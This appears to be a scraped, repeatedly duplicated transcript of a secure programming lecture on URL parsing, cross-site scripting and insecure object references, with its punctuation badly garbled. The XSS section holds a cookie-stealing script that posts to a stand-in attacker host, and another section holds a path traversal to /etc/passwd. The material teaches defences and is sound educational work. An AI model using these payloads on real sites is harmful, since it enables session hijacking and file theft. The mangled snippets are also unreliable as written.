Secure Programming Lecture 11: Web Application Security II · the most important case of secure programming today. É Web is ubiquitous É browsers on almost every device É cloud
Post on 04-Jul-2020
1 Views
Preview:
Transcript
Secure Programming Lecture 11 WebApplication Security II
David Aspinall
3rd March 2014
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
